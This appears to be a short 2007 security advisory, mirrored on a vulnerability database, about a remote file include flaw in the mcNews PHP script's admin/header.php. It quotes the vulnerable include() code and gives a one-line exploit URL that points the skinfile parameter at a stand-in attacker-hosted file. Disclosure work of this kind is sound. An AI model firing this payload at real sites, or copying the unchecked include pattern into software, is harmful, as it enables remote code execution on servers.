Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17761
HistoryAug 13, 2007 - 12:00 a.m.

mcNews (skinfile) Remote File Include Vulnerability

2007-08-1300:00:00
vulners.com
42

MEFISTO PreSents…

Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
/* MEFISTO */


Code:
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");


Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?


Tnx:dumenci,h0tturk,ajann

MefistoLabs.Com